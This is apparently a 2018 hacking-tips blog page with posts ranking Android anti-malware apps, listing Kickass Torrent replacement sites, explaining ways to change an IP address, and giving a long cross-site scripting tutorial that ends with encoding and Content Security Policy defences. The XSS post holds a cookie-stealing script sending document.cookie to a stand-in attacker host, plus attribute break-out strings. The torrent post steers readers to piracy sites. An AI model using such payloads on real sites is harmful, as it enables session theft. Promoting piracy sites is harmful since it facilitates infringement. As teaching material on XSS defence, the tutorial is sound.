Saturday, July 14, 2018

Top 8 Best Malware Removal Tools and Apps of 2018


                    In Short Hacks: With the increasing use of Android smartphones around the world, the threats to your phone's security have increased as well. Whether you are an Android power user who does a great deal of internet-related work on your phone or someone who only uses it for basic tasks, you should still have an anti-virus or anti-malware app installed for its safety and protection.

#1 Why should you have an anti-malware app?

If you do not have an anti-virus or anti-malware application on your smartphone, your phone may be at risk of infection from malicious apps and other kinds of malware. A good anti-malware app not only gives you some assurance that your smartphone is free of malware but also protects your privacy. Not every app that calls itself anti-malware is safe, though: plenty of apps on the market are themselves harmful. Before installing one, check who publishes it and which permissions it requests; a scanner that wants your contacts, SMS and location for no stated reason is a warning sign.

#2 Difference between anti-virus and anti-malware apps:

Remember that there is a difference between anti-virus and anti-malware apps. A virus is one sub-category of malware: a program that spreads by copying itself into other programs or files. 'Malware' is the general term for any software written to harm a device or its user, which also covers trojans, spyware, adware and ransomware. An anti-malware app therefore promises broader coverage than a pure anti-virus app, although in practice most current products detect all of these categories.

#3 Best anti-malware apps for your smartphone:

So here we are with some of the best anti-malware apps for your Android device. The list includes both free and paid applications so choose according to your convenience.

Best Malware Removal Apps (Free) 2018


1. Avira:


Avira is among the best-known antivirus apps for Android, and its popularity has grown quickly over the last year. The free version includes device scans, external SD card scans, real-time protection and more. The Pro version adds anti-theft support, blacklisting, privacy scanning and device-admin features, and it is less expensive than most competing apps. For most users, though, the free version does the job.

2. Bitdefender Antivirus:

The best thing about Bitdefender Antivirus is that it is entirely free, and its feature set has stayed the same over time. It offers on-demand scanning, quick performance and a simple interface, which makes it a good choice for basic anti-malware protection. A larger paid version offers more in-depth protection, but we believe the free app has everything a typical Android device needs; it is supported by ads.

3. CM Security Lite:

CM Security Lite is another completely free anti-malware app for Android. It works much like Bitdefender's free app, though it does not include boost or other cleaning features. It scans your device and your external SD card, and its scheduled-scanning option comes in handy. For beginners and basic use it is sufficient, and it does not show ads either.

4. TrustGo Antivirus & Mobile Security:

TrustGo is another useful antivirus app, and it is completely free. It offers device scanning, protection from malware and viruses, app scanning and memory-card scanning, plus extras such as an app manager, data backup and a privacy adviser. Unlike many other antivirus apps, you do not need to upgrade to a pro version to use most of its features.

5. Google Play Protect:

Google Play Protect is Google's own malware scanner. It scans the apps on your device and checks them against what Google knows about those apps from Google Play, to flag ones that are harmful or have been tampered with. You get it for free and, as a matter of fact, you probably already have it on your device without knowing it, because it is built into Google Play services. It is more than an anti-malware app, as it provides several other protections as well.

6. Norton Security:

Norton Security has perks of its own. It comes in free and paid versions, and the free version already offers a lot, including protection from malware and spyware. Additional features include saving the device's location when the battery is low, real-time protection, anti-theft features and more. The paid version is costly at $39.99 per year, but that price covers both your smartphone and your computer.

7. McAfee:

McAfee is one of the names that comes to mind automatically whenever the word "anti-virus" is heard. The app needs no introduction: it includes scanning, anti-spyware, other security features and anti-theft. It can photograph a person who tries to unlock your stolen phone, record the phone's location to the cloud before it shuts down, and more.

8. Malwarebytes:

Malwarebytes is another well-known anti-malware app that takes care of most of your phone's security needs. It has an up-to-date malware database, detects malware and ransomware, includes a permission tracker and more. It can also scan your WhatsApp, Facebook and SMS messages for malicious content. It is priced at $1.49 per month or $11.99 per year.

Conclusion:

These were some of the best malware removal apps for your Android device. Try them out and see which one suits your device best. If we have not listed your favourite malware removal app, let us know in the comments section below.

Top 8 Best Kickass Torrent Alternatives (KAT Working) 2018

                    In Short Hacks: The torrent scene on the internet sees ups and downs every day. Torrent sites used to be a reliable source for getting almost any file or movie free of charge, but times change, and the sites themselves are the biggest targets: news of another torrent site shutting down arrives almost daily. The most successful of them was Kickass Torrents, which is no longer reachable through Google. Meanwhile many people keep registering new domains for Kickass and promoting them as Kickass torrent alternatives, KAT mirrors and the like.
Kickass Torrent (Kat.ph) Alternatives 2018: With numerous movies coming out every week, it is nearly impossible to watch every one in the theatre, for reasons of both time and money. Sometimes we also want to watch a movie that is no longer showing. Sites exist where you can buy or rent movies, but that takes a toll on your wallet, which is why many people turn to torrent websites, where nearly any movie can be found free of cost.
Kickass (KAT) was a popular torrent website that provided torrent files and magnet links for movies. The site is blocked in several countries, so people there cannot reach it and download from it. Below are some of the best alternatives to the Kickass torrent website; let's take a look at what each of them offers.
As we all know, Kickass Torrents changed its domains and proxies regularly. The domains it used were: kat.cr kat.ph

Waooo!! Kickass Torrents (katcr.co) is Back!

Were you missing Kickass Torrents? Here is good news for its fans: members of the original staff of the famous torrent site have returned to launch it again, with the same experience the old Kickass Torrents offered.
The new KAT is available at https://katcr.co/ and presents itself as a continuation of the project that ended with the closure of kat.cr and kat.ph. The new site keeps the original web UI and UX and includes a large directory of sections, assembled by staff who were part of the original KickassTorrents. Be careful with revived domains of seized sites in general: look-alike domains that trade on a well-known name are a common way to push malware and scams, so check the exact domain before downloading anything.

(kat.ph, kat.co) KickAss Torrent Alternatives 2018


#1 The Pirate Bay: Best Torrent Alternatives

The Pirate Bay, TPB for short, is another famous website offering torrent files and magnet links. It has a huge collection of content waiting to be accessed, and it is the best working alternative to the old Kickass in 2018.
You Can Download:
  • Audio
  • Video
  • Applications
  • Games
  • P*rn

#2 YTS | Kat.ph Alternative

YTS.Ag is one of the best alternatives to the Kickass torrent website. On this site you can download YIFY-labelled movie torrents in 720p, 1080p and 3D quality. The site claims to be the official home of YIFY movies, but the original YTS and YIFY group has denied this and kept the official brand name for itself. Even so, the site will do the job for you.

#3 ExtraTorrent: Largest Torrenting Site

Another good alternative to Kickass is ExtraTorrent. It was rumoured to be the home of the ETTV and ETRG release groups. It is a good destination for those looking for torrents of movies, games, TV shows, pictures and more, and the site is constantly developed based on user feedback.

#4 RarBG

What sets RarBG apart from other sites is that you can watch a movie's trailer online for a quick look and inspect the top 10 torrents of each category. RarBG is one of the best Kickass alternatives still working in 2018. You can download movies, TV shows, games, music, software and more, and the site is growing quickly.

#5 Isohunt

This site was among those banned for providing torrent files and magnet links, but it managed to come back. It is one of the most visited torrent sites. Apart from its large collection, people can sign up to join IsoHunt's large community and take part in forum discussions.

#6 Torrent Hound: Best Torrent Alternatives

This is an under-rated site that never reached the limelight because of larger sites such as KAT and TPB. You will find the newest movies and TV shows here. The site shows live statistics of its downloads and also hosts a torrent client of its own, which it says keeps users safer while downloading.

#7 1337X

This is one of the best alternatives to the Kickass (KAT) website; it has all the content Kickass could provide. The user interface is easy to use and understand. The site has nine categories: movies, television, games, music, applications, anime, documentaries, other and XXX. You can see the number of seeders and leechers for each torrent.

#8 uTorrent: A Torrent Client, Not a Site

uTorrent is often listed as a Kickass alternative, but it is a BitTorrent client, not a torrent index: it is the program that downloads the files referenced by the .torrent files and magnet links you get from the sites above, and it does not replace a site such as kat.cr. It has been one of the most used torrent clients for years, and most users know it well, so you will probably want it installed alongside whichever site you pick.

How does Torrent work?

A torrent swarm is made up of three kinds of participants, and together they make uploading and downloading of movies, files and so on fast:
  • Seeders: clients that already hold the complete file and only upload it to others.
  • Leechers: clients that are still downloading the file (like us 😛); they also upload the pieces they already have.
  • Peers: the general term for every client in the swarm, seeders and leechers alike. 🙂

How To Change IP Address in 5 Second (Working)

Change IP Address: An IP address is the identifier of your computer on the local network or on the internet, and anyone doing security work wants to avoid being traced by it. Changing your IP address is not hard, and here you will find several easy ways to do it, with video tutorials. Every time you connect to the internet your ISP (Internet Service Provider) assigns a public IP address to your connection, which makes it possible for websites and applications to track your online activity and work out your approximate physical location. To protect your privacy, it is therefore sometimes necessary to change your IP address.
Ways to Change IP Address 
Below are some of the possible ways to change the IP address of your computer; iTech Hacks has also shot a video tutorial on changing your IP address in less than 5 seconds.

How To Find Your IP Address:

Finding your IP is simple: open Google, type "MY IP", and it shows your public IP address. Note that this is the address your ISP assigned to your router, which is what websites see; the address your own computer reports (ipconfig on Windows, ip addr on Linux) is usually a private LAN address such as 192.168.x.x that never leaves your home network. Follow the video tutorial to learn more.

#1. SaferVPN – Change IP in 5 Seconds

SaferVPN is software available for both Windows and Mac. With it you can change your IP address in less than 5 seconds; the SaferVPN network is easy to use and lets you browse from another country's IP address.

#2. Using a VPN: Best Way to Change IP Address

Although there are several ways to change your IP address, using a VPN is by far the best and most secure. Unlike a web proxy, which only handles the traffic of the browser or application configured to use it, a VPN routes all of your device's traffic through an encrypted tunnel to the VPN server, so every website sees the server's address instead of yours. Below are some of the most popular VPN services.

#3. Hide My Ass VPN.

Hide My Ass is one of the most popular VPN services. It provides fast servers that let you change your IP address and obtain an address from any country of your choice.
VyprVPN – VyprVPN advertises very fast VPN servers that let clients hide their real IP address, and it supports a wide range of operating systems.
#4. Change IP by Restarting the Router
Every time you connect to the internet your ISP may assign a different address to your connection, called a dynamic IP. If your connection uses a dynamic IP, you can often change it just by restarting your modem or router: switch it off for a few seconds and on again, and the ISP's DHCP server may hand out a different address. Whether it does depends on the ISP; many keep handing back the same address until the old lease has expired, so you may need to leave the device off for longer.
Unlike using a VPN, this method has drawbacks. The newly assigned IP will be in the same location and country as before, so it will not help bypass a country block, and if your connection uses a static IP address you will get the same address no matter how many times you restart the router.
#5. Using a Free Web Proxy to Change Your IP Address
If you cannot afford a VPN service or restarting the router does not get you a new IP, you can try some of the free browser-based proxy services that change the address websites see. Keep in mind that the proxy operator can read everything you send through it, including any passwords you type, and can alter the pages you receive, so use such services only for browsing that involves nothing sensitive. Some websites offering free proxy services:
www.onlineipchanger.com
www.rapidproxy.us
www.proxysite.com
www.englandproxy.co.uk
www.filterbypass.me

XSS Full Guide Tutorial: All About Cross Site Scripting


                            Many skilled hackers attack websites with XSS. What is XSS, and how do hackers compromise websites using it? In this tutorial I'll give you a full overview of XSS. Let me say one thing before you learn it: "I am not taking any responsibility for any issue; learn this only for educational purposes, not for misuse." Let's go ahead and see the full XSS guide.

#1 XSS Full Tutorial Guide: Overview

What is XSS?

Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user’s browser.
Inside Hacks: The attacker does not target the victim directly. Instead, he exploits a vulnerability in a website that the victim visits, so that the website delivers the malicious JavaScript for him. To the victim's browser the malicious JavaScript appears to be a legitimate part of the website, and the website has thus acted as an unintentional accomplice to the attacker.

How the malicious JavaScript is injected

The only way for the attacker to run his malicious JavaScript in the victim’s browser is to inject it into one of the pages that the victim downloads from the website. This can happen if the website directly includes user input in its pages, because the attacker can then insert a string that will be treated as code by the victim’s browser.
In the example below, a simple server-side script is used to display the latest comment on a website:
print "<html>"
print "Latest comment:"
print database.latestComment
print "</html>"
The script assumes that a comment consists only of text. However, since the user input is included directly, without any encoding, an attacker could submit this comment: <script>…</script>. Any user visiting the page would then receive the following response:
<html>
Latest comment:
<script>...</script>
</html>
When the user’s browser loads the page, it will execute whatever JavaScript code is contained inside the <script> tags. The attacker has now succeeded with his attack.


What is malicious JavaScript?

At first, the ability to execute JavaScript in the victim’s browser might not seem particularly malicious. After all, JavaScript runs in a very restricted environment that has extremely limited access to the user’s files and operating system. In fact, you could open your browser’s JavaScript console right now and execute any JavaScript you want, and you would be very unlikely to cause any damage to your computer.
However, the possibility of JavaScript being malicious becomes more clear when you consider the following facts:
  • JavaScript has access to some of the user’s sensitive information, such as cookies.
  • JavaScript can send HTTP requests with arbitrary content to arbitrary destinations by using XMLHttpRequest and other mechanisms.
  • JavaScript can make arbitrary modifications to the HTML of the current page by using DOM manipulation methods.
These facts combined can cause very serious security breaches, as we will explain next.


The consequences of malicious JavaScript

Among many other things, the ability to execute arbitrary JavaScript in another user’s browser allows an attacker to perform the following types of attacks:
Cookie theft: The attacker can read the victim's cookies for the website through document.cookie, send them to his own server and use them to extract sensitive information such as session IDs. (Cookies set with the HttpOnly flag are not exposed to document.cookie, which is why session cookies should always carry it; the injected script can still make requests that the browser sends with the victim's cookies attached, though.)
Keylogging: The attacker can register a keyboard event listener using addEventListener and send all of the user's keystrokes to his own server, potentially capturing passwords and credit card numbers.
Phishing: The attacker can insert a fake login form into the page using DOM manipulation, set the form's action attribute to his own server, and trick the user into submitting sensitive information.
Although these attacks differ significantly, they all have one crucial similarity: because the attacker has injected code into a page served by the website, the malicious JavaScript runs in the context of that website. This means it is treated like any other script from that website: it runs in the website's origin, it has access to the victim's data for that website (such as cookies), and the host name shown in the URL bar is still that of the website. For all intents and purposes, the script is considered a legitimate part of the website, allowing it to do anything the actual website can.

This fact highlights a key issue:

If an attacker can use your website to execute arbitrary JavaScript in another user’s browser, the security of your website and its users has been compromised.
To emphasize this point, some examples in this tutorial will leave out the details of a malicious script by only showing <script>…</script>. This indicates that the mere presence of a script injected by the attacker is the problem, regardless of which specific code the script actually executes.

#2 Part Two: XSS Attacks

Actors in an XSS Attack:

Before we describe in detail how an XSS attack works, we need to define the actors involved. In general, an XSS attack involves three actors: the website, the victim, and the attacker.
  • The website serves HTML pages to users who request them. In our examples, it is located at http://website/.
  • The website’s database is a database that stores some of the user input included in the website’s pages.
  • The victim is a normal user of the website who requests pages from it using his browser.
  • The attacker is a malicious user of the website who intends to launch an attack on the victim by exploiting an XSS vulnerability in the website.
  • The attacker’s server is a web server controlled by the attacker for the sole purpose of stealing the victim’s sensitive information. In our examples, it is located at http://attacker/.

An example Attack Scenario:

In this example, we will assume that the attacker’s ultimate goal is to steal the victim’s cookies by exploiting an XSS vulnerability in the website. This can be done by having the victim’s browser parse the following HTML code:
<script>
window.location='http://attacker/?cookie='+document.cookie
</script>
This script navigates the user's browser to a different URL, triggering an HTTP request to the attacker's server. The URL includes the victim's cookies as a query parameter, which the attacker can extract from the request when it arrives at his server. (A real attack would usually send the cookies in the background, for example by loading an image from http://attacker/ with the cookies in its URL, so that the victim does not notice the page changing.) Once the attacker has the cookies, he can use them to impersonate the victim and launch further attacks.
From now on, the HTML code above will be referred to as the malicious string or the malicious script. It is important to note that the string itself is only malicious if it ultimately gets parsed as HTML in the victim’s browser, which can only happen as the result of an XSS vulnerability in the website.

How this Example Attack Works:

The diagram below illustrates how this example attack can be performed by an attacker:
#1 The attacker uses one of the website’s forms to insert a malicious string into the website’s database.
#2 The victim requests a page from the website.
#3 The website includes the malicious string from the database in the response and sends it to the victim.
#4 The victim’s browser executes the malicious script inside the response, sending the victim’s cookies to the attacker’s server.

Types of XSS:

While the goal of an XSS attack is always to execute malicious JavaScript in the victim's browser, there are a few fundamentally different ways of achieving that goal. XSS attacks are often divided into three types:
  • Persistent XSS, where the malicious string originates from the website's database.
  • Reflected XSS, where the malicious string originates from the victim's request.
  • DOM-based XSS, where the vulnerability is in the client-side code rather than the server-side code.
The previous example illustrated a persistent XSS attack. We will now describe the other two types: reflected XSS and DOM-based XSS.


Reflected XSS:

In a reflected XSS attack, the malicious string is part of the victim’s request to the website. The website then includes this malicious string in the response sent back to the user. The diagram below illustrates this scenario:
#1 The attacker crafts a URL containing a malicious string and sends it to the victim.
#2 The victim is tricked by the attacker into requesting the URL from the website.
#3 The website includes the malicious string from the URL in the response.
#4 The victim’s browser executes the malicious script inside the response, sending the victim’s cookies to the attacker’s server.


How can reflected XSS succeed?

At first, reflected XSS might seem harmless because it requires the victim himself to actually send a request containing a malicious string. Since nobody would willingly attack himself, there seems to be no way of actually performing the attack.
As it turns out, there are at least two common ways of causing a victim to launch a reflected XSS attack against himself:
  1. If the attacker targets a specific individual, he can send the malicious URL to the victim (by e-mail or instant messaging, for example) and trick him into visiting it.
  2. If the attacker targets a large group of people, he can publish a link to the malicious URL (on his own website or on a social network, for example) and wait for visitors to click it.
These two methods are similar, and both can be more successful with the use of a URL shortening service, which hides the malicious string from users who might otherwise recognise it.

DOM-based XSS:

DOM-based XSS is a variant of both persistent and reflected XSS. In a DOM-based XSS attack, the malicious string is not actually parsed by the victim’s browser until the website’s legitimate JavaScript is executed. The diagram below illustrates this scenario for a reflected XSS attack:
#1 The attacker crafts a URL containing a malicious string and sends it to the victim.
#2 The victim is tricked by the attacker into requesting the URL from the website.
#3 The website receives the request, but does not include the malicious string in the response.
#4 The victim’s browser executes the legitimate script inside the response, causing the malicious script to be inserted into the page.
#5 The victim’s browser executes the malicious script inserted into the page, sending the victim’s cookies to the attacker’s server.

What makes DOM-based XSS different:

In the previous examples of persistent and reflected XSS attacks, the server inserts the malicious script into the page, which is then sent in a response to the victim. When the victim’s browser receives the response, it assumes the malicious script to be part of the page’s legitimate content and automatically executes it during page load as with any other script.
In the example of a DOM-based XSS attack, however, no malicious script is inserted as part of the page; the only script that is automatically executed during page load is a legitimate part of the page. The problem is that this legitimate script takes user input from a source the attacker controls (the URL fragment or a query parameter, for example) and uses it to add HTML to the page. Because the malicious string is inserted using innerHTML, it is parsed as HTML, and the attacker's code runs. Note that a <script> element inserted through innerHTML is not executed by the browser, so in practice the attacker uses a payload such as an <img> tag with an onerror handler, which fires as soon as it is parsed.
The difference is subtle but important:
  • In traditional XSS, the malicious JavaScript is executed when the page is loaded, as part of the HTML sent by the server.
  • In DOM-based XSS, the malicious JavaScript is executed at some point after the page has loaded, as a result of the page’s legitimate JavaScript treating user input in an unsafe way.

#3 Part Three: Preventing XSS

Methods of preventing XSS
Recall that an XSS attack is a type of code injection: user input is mistakenly interpreted as program code. To prevent this, secure input handling is needed. For a web developer there are two fundamentally different ways of performing it:
  • Encoding, which escapes the user input so that the browser interprets it only as data, not as code.
  • Validation, which filters the user input so that the browser interprets it as code without malicious commands.
While these are fundamentally different methods of preventing XSS, they share several features that are important to understand when using either of them:
  • Context: Secure input handling needs to be performed differently depending on where in a page the user input is inserted.
  • Inbound/outbound: Secure input handling can be performed either when your website receives the input (inbound) or right before your website inserts the input into a page (outbound). Outbound handling is the more reliable of the two, because only at that point is the context known.
  • Client/server: Secure input handling can be performed either on the client side or on the server side; both are needed under different circumstances.
Before explaining in detail how encoding and validation work, we will describe each of these points.

Input handling contexts:

There are many contexts in a web page where user input might be inserted. For each of them, specific rules must be followed so that the user input cannot break out of its context and be interpreted as code. Below are the most common contexts:
Context                 Example code
HTML element content    <div>userInput</div>
HTML attribute value    <input value="userInput">
URL query value         http://example.com/?parameter=userInput
CSS value               color: userInput
JavaScript value        var name = "userInput";

Why context matters:

In all of the contexts described, an XSS vulnerability would arise if user input were inserted before first being encoded or validated. An attacker would then be able to inject malicious code by simply inserting the closing delimiter for that context and following it with the malicious code.
For example, if at some point a website inserts user input directly into an HTML attribute, an attacker would be able to inject a malicious script by beginning his input with a quotation mark, as shown below:
Application code    <input value="userInput">
Malicious string    "><script>...</script><input value="
Resulting code      <input value=""><script>...</script><input value="">

Encoding:

Encoding is the act of escaping user input so that the browser interprets it only as data, not as code. The most recognizable type of encoding in web development is HTML escaping, which converts characters like < and > into &lt; and &gt;, respectively.
The following example (Python) shows how user input could be encoded using HTML escaping and then inserted into a page by a server-side script:
import html  # html.escape converts <, >, &, and quotes into HTML entities
print("<html>")
print("Latest comment: ")
print(html.escape(user_input))
print("</html>")
If the user input were the string <script>…</script>, the resulting HTML would be as follows:
<html>
Latest comment:
&lt;script&gt;...&lt;/script&gt;
</html>
Encoding on the client-side
When encoding user input on the client-side using JavaScript, there are several built-in methods and properties that automatically encode all data in a context-aware manner:
Context                 Method/property
HTML element content    node.textContent = userInput
HTML attribute value    element.setAttribute(attribute, userInput)
                        or
                        element[attribute] = userInput
URL query value         window.encodeURIComponent(userInput)
CSS value               element.style.property = userInput
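The following is an added example, not code from the original article: small context-aware encoders for the insertion contexts listed in the tables above, applied to the attribute break-out string from the earlier table so the unencoded and encoded results can be compared. It runs under Node.js; the sample input is the constructed malicious string, and the encoders are illustrative implementations rather than the DOM methods listed above.

```javascript
// Added example, not code from the original article: context-aware encoders
// for the insertion contexts listed above, applied to the attribute break-out
// string from the earlier table. Runs under Node.js with no dependencies.

// HTML element content and attribute values: escape the characters that can
// open a tag, close a quoted attribute, or start an entity.
function encodeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// URL query values: percent-encode everything outside the unreserved set.
function encodeUrlQueryValue(input) {
  return encodeURIComponent(String(input));
}

// JavaScript string literals: hex-escape every non-alphanumeric character so
// the input can neither close the quote nor contain a literal </script>.
function encodeJsString(input) {
  return String(input).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Constructed sample: the malicious string from the attribute example above.
const MALICIOUS = '"><script>...</script><input value="';

// Render the same input into each context, once without encoding (the
// vulnerable application code) and once with the matching encoder.
function render(userInput) {
  return {
    attrUnsafe: `<input value="${userInput}">`,
    attrSafe: `<input value="${encodeHtml(userInput)}">`,
    contentSafe: `<div>${encodeHtml(userInput)}</div>`,
    urlSafe: `http://example.com/?parameter=${encodeUrlQueryValue(userInput)}`,
    jsSafe: `var name = "${encodeJsString(userInput)}";`,
  };
}

// Count opening tags of one kind; a break-out shows up as an extra <input>
// or an injected <script> that the browser would actually parse.
function countTags(html, tagName) {
  return (html.match(new RegExp("<" + tagName + "\\b", "gi")) || []).length;
}
```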

Validation:

Validation is the act of filtering user input so that all malicious parts of it are removed, without necessarily removing all code in it. One of the most recognizable types of validation in web development is allowing some HTML elements (such as <em> and <strong>) but disallowing others (such as <script>).
There are two main characteristics of validation that differ between implementations:
Classification strategy: User input can be classified using either blacklisting or whitelisting.
Validation outcome: User input identified as malicious can either be rejected or sanitized.


Content Security Policy (CSP):

The disadvantage of protecting against XSS by using only secure input handling is that even a single lapse of security can compromise your website. A recent web standard called Content Security Policy (CSP) can mitigate this risk.
CSP is used to constrain the browser viewing your page so that it can only use resources downloaded from trusted sources. A resource is a script, a stylesheet, an image, or some other type of file referred to by the page. This means that even if an attacker succeeds in injecting malicious content into your website, CSP can prevent it from ever being executed.

CSP in Action:

In the following example, an attacker has succeeded in injecting malicious code into a page:
<html>
Latest comment:
<script src="http://attacker/malicious-script.js"></script>
</html>
With a properly defined CSP policy, the browser would not load and execute malicious-script.js because http://attacker/ would not be in the set of trusted sources. Even though the website failed to securely handle user input in this case, the CSP policy prevented the vulnerability from causing any harm.
Even if the attacker had injected the script code inline rather than linking to an external file, a properly defined CSP policy disallowing inline JavaScript would also have prevented the vulnerability from causing any harm.


How to enable CSP:

By default, browsers do not enforce CSP. To enable CSP on your website, pages must be served with an additional HTTP header: Content-Security-Policy. Any page served with this header will have its security policy respected by the browser loading it, provided that the browser supports CSP.
Since the security policy is sent with every HTTP response, it is possible for a server to set its policy on a page-by-page basis. The same policy can be applied to an entire website by providing the same CSP header in every response.
The value of the Content-Security-Policy header is a string defining one or more security policies that will take effect on your website. The syntax of this string will be described next.
The example headers in this section use newlines and indentation for clarity; these should not be present in an actual header.

Syntax of CSP

The syntax of a CSP header is as follows (source expressions within a directive are separated by spaces, and directives are separated by semicolons):
Content-Security-Policy:
    directive source-expression source-expression ...;
    directive ...;
    ...

Directives

The directives that can be used in a CSP header are as follows:
connect-src
font-src
frame-src
img-src
media-src
object-src
script-src
style-src
In addition to these, the special directive default-src can be used to provide a default value for all directives that have not been included in the header.
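As an added example (not code from the original article), the following Node.js snippet is a minimal evaluator for the header syntax described above: it parses the directives, applies the default-src fallback, and answers whether an external script such as the injected malicious-script.js, or an inline script, would be allowed. The sample header and page URL are constructed, and the source matching is deliberately limited to 'self', 'none', 'unsafe-inline' and scheme://host[:port] sources rather than the full specification.

```javascript
// Added example, not code from the original article: a minimal evaluator for
// the CSP header syntax described above. Source matching covers 'self',
// 'none', 'unsafe-inline' and scheme://host[:port] sources only.

// "directive src src; directive src" -> Map(directive -> [sources]).
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [directive, ...sources] = tokens;
    policy.set(directive.toLowerCase(), sources);
  }
  return policy;
}

// A fetch directive such as script-src falls back to default-src when it is
// not present in the header; null means the policy does not restrict it.
function sourcesFor(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  return policy.get("default-src") || null;
}

function originOf(url) {
  return new URL(url).origin; // scheme://host[:port]
}

// Would the browser load <script src=scriptUrl> on a page at pageUrl?
function scriptAllowed(header, pageUrl, scriptUrl) {
  const sources = sourcesFor(parseCsp(header), "script-src");
  if (sources === null) return true;
  const pageOrigin = originOf(pageUrl);
  const scriptOrigin = originOf(scriptUrl);
  return sources.some((src) => {
    if (src === "'self'") return scriptOrigin === pageOrigin;
    if (src.startsWith("'")) return false; // 'none', 'unsafe-inline', ...
    // Host sources without a scheme inherit the page's scheme.
    const withScheme = src.includes("://") ? src : new URL(pageUrl).protocol + "//" + src;
    return originOf(withScheme) === scriptOrigin;
  });
}

// Inline <script> blocks run only when 'unsafe-inline' is listed (or when
// script execution is not restricted at all).
function inlineScriptAllowed(header) {
  const sources = sourcesFor(parseCsp(header), "script-src");
  return sources === null || sources.includes("'unsafe-inline'");
}
```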


#4 At Last: Summary

#1 XSS is a code injection attack made possible through insecure handling of user input.
#2 A successful XSS attack allows an attacker to execute malicious JavaScript in a victim’s browser.
#3 A successful XSS attack compromises the security of both the website and its users.


Summary: XSS Attacks

There are three major types of XSS attacks:
  1. Persistent XSS, where the malicious input originates from the website’s database.
  2. Reflected XSS, where the malicious input originates from the victim’s request.
  3. DOM-based XSS, where the vulnerability is in the client-side code rather than the server-side code.
All of these attacks are performed in different ways but have the same effect if they succeed.


Summary: Preventing XSS

#1 The most important way of preventing XSS attacks is to perform secure input handling.
#2 Most of the time, encoding should be performed whenever user input is included in a page.
#3 In some cases, encoding has to be replaced by or complemented with validation.
#4 Secure input handling has to take into account which context of a page the user input is inserted into.
#5 To prevent all types of XSS attacks, secure input handling has to be performed in both client-side and server-side code.
#6 Content Security Policy provides an additional layer of defense for when secure input handling fails.